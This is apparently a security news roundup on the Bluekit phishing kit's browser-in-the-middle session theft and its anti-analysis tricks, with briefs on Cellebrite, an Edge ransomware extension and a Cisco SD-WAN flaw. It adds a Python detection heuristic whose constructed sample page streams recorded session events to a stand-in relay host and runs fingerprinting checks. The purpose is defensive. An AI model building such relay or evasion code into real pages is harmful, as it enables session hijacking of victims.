News Article · Jun 26, 2026 at 6:38 AM
Bluekit Phishing Kit Adds Browser-in-the-Middle Tactic as Russia Targets Activists via Cellebrite
Security #phishing #Cisco #Russia #browser-in-the-middle #Cellebrite #Edge extension #Bluekit #rrweb

Bluekit phishing-as-a-service adds browser-in-the-middle for real-time session theft, while Russia uses Cellebrite to access activist phones. Cisco SD-WAN flaws exploited months before disclosure.

The Bluekit phishing-as-a-service platform has added browser-in-the-middle capabilities, according to a new report from Netcraft. Nearly 70 new hostnames tied to the service were identified in the past week alone. The technique gives attackers real-time access to victim sessions after login.

Bluekit first appeared in April with an AI assistant that supports multiple large language models including Llama, GPT-4.1, Claude, Gemini, and DeepSeek. The kit originally offered 40 templates targeting Outlook, Hotmail, Gmail, Yahoo, ProtonMail, iCloud, GitHub, and Ledger. Netcraft reports that Bluekit now uses the open-source JavaScript library rrweb to serialize the page's DOM and stream it over a WebSocket to the attacker. The attacker's browser loads the legitimate login page and relays input between victim and service. Authentication completes in the attacker's browser, granting a valid session token and unlimited access.

New Anti-Analysis Features in Bluekit

Before stealing credentials, Bluekit runs a comprehensive victim qualification system to filter out researchers and security crawlers. The latest version includes:

  • Randomized CSS filters to defeat screenshot-based detection.
  • A large, frequently changing obfuscated JavaScript bundle over 1 MB in size.
  • Custom CAPTCHA that imitates Cloudflare or the target brand.
  • Browser fingerprinting for RAM, CPU cores, screen resolution, language, headless browser detection, and anti-fingerprinting extensions.
  • WebRTC-based IP mismatch detection to identify users behind proxies or VPNs.

Netcraft notes that rrweb itself is a legitimate library widely used for session replay, so its presence alone is not an indicator of compromise. Added latency on keyboard input and mouse clicks, introduced by the relay hop, may signal a browser-in-the-middle (BitM) attack.

Phone Cracking, Dairy Attacks, and Sandbox Escape

Separately, Russian authorities used Cellebrite phone-cracking tools to access the phone of human rights activist Andrey Pivovarov, according to Citizen Lab. This occurred even after the company canceled its contract with Russia. The incident underscores how forensic tools can outlive official agreements once in state hands.

A dairy manufacturer in Russia's Bashkortostan republic was also disrupted by a cyberattack, as reported by The Record. The incident follows a pattern of attacks on Russian food producers.

Researchers discovered a malicious Microsoft Edge extension that breaks out of the browser sandbox and installs ransomware. The extension abuses Native Messaging to bridge into the host operating system, according to TechRadar Pro.

A high-severity vulnerability in Cisco Catalyst SD-WAN Manager was exploited as early as March, months before its June disclosure, Google warned. The flaw allowed attackers to gain root access to affected devices.

Organizations facing these threats should monitor for unusual browser behavior, review extension permissions, and patch SD-WAN systems immediately. The Bluekit report provides detection signals including CSS filter manipulation, WebSocket connections opened from login pages, and WebRTC-based IP checks, but Netcraft cautions that none of these is a standalone indicator of compromise.
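As an added defender-side illustration (not code from the Netcraft report or from the Bluekit kit itself), here is one way to combine those signals without treating any single one as an indicator: a heuristic over captured page source, run against two constructed sample pages. The regular expressions are assumptions about how each signal shows up in source, and the thresholds are arbitrary.

```python
import re

# Heuristics mirroring the signals Netcraft lists for Bluekit's BitM mode:
# rrweb on a login page, a WebSocket opened from that page, WebRTC IP probing,
# CSS filter manipulation and hardware/headless fingerprinting. The regexes are
# an assumption about how those surface in page source, not Netcraft's rules.
SIGNALS = {
    "rrweb": re.compile(r"\brrweb\b", re.I),
    "websocket": re.compile(r"new\s+WebSocket\s*\(", re.I),
    "webrtc_probe": re.compile(r"RTCPeerConnection|onicecandidate", re.I),
    "css_filter": re.compile(r"\.filter\s*=|filter\s*:\s*(?:hue-rotate|contrast|saturate|invert)\(", re.I),
    "fingerprint": re.compile(r"navigator\.(?:deviceMemory|hardwareConcurrency|webdriver)", re.I),
}
PASSWORD_FIELD = re.compile(r"type\s*=\s*['\"]password['\"]", re.I)

def assess_page(source: str) -> dict:
    """Return matched signals and a verdict for one page's HTML/JS source.

    A lone hit (e.g. rrweb on a site that uses it for session replay) is
    reported as 'benign': per Netcraft these are not standalone indicators.
    Only a credential form combined with several signals is flagged.
    """
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(source))
    has_login = bool(PASSWORD_FIELD.search(source))
    if has_login and len(hits) >= 3:
        verdict = "suspicious"
    elif has_login and hits:
        verdict = "review"
    else:
        verdict = "benign"
    return {"login_form": has_login, "signals": hits, "verdict": verdict}

# Constructed samples (not real Bluekit code): a BitM-style login page and a
# legitimate page that only loads rrweb for ordinary session replay.
BITM_SAMPLE = """
<form><input name="u"><input type="password" name="p"></form>
<script src="/vendor/rrweb.min.js"></script>
<script>
  document.body.style.filter = "hue-rotate(" + Math.random() * 360 + "deg)";
  if (navigator.webdriver || navigator.hardwareConcurrency < 2) location.href = "/";
  var pc = new RTCPeerConnection({iceServers: []}); pc.onicecandidate = function (e) {};
  var ws = new WebSocket("wss://relay.example.invalid/s");
  rrweb.record({emit: function (ev) { ws.send(JSON.stringify(ev)); }});
</script>
"""
BENIGN_SAMPLE = """
<h1>Welcome</h1><script src="/static/rrweb.min.js"></script>
<script>rrweb.record({emit: function (ev) { navigator.sendBeacon("/replay", JSON.stringify(ev)); }});</script>
"""
```

Running `assess_page(BITM_SAMPLE)` yields the verdict "suspicious" with all five signals, while the benign replay page yields "benign" with only the rrweb hit.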

Fact check

  • Bluekit added browser-in-the-middle capabilities using the rrweb JavaScript library. (verified)
  • Nearly 70 new hostnames for Bluekit were identified over the past week. (verified)
  • Russian authorities used Cellebrite tools to access activist Andrey Pivovarov's phone after the contract with the company was canceled. (reported)
  • A high-severity vulnerability in Cisco Catalyst SD-WAN Manager was exploited as early as March 2026. (reported)
  • A malicious Microsoft Edge extension escapes the browser sandbox to install ransomware. (reported)
